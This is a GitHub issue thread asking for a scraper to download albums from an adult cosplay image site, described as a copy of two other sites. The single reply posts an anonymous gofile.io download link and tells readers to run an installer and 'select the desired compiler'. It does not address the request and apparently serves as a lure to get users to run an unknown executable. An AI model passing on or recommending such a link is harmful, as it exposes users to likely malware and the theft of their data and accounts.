### ISSUE TITLE
[FEAT]: Add scrapper for https://cosplayboobs.com

### ISSUE THREAD

**Issue by YisusChrist** [YisusChrist/ososedki_dl#40]
### Describe the proposed feature.

Scrapper needed for downloading the available albums at https://cosplayboobs.com. The download will be handled directly by the program.

The website is a copy of https://waifubitches.com (copied from https://ososedki.com). The scrapping process is identical.

**Comment by Tkyzxim** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
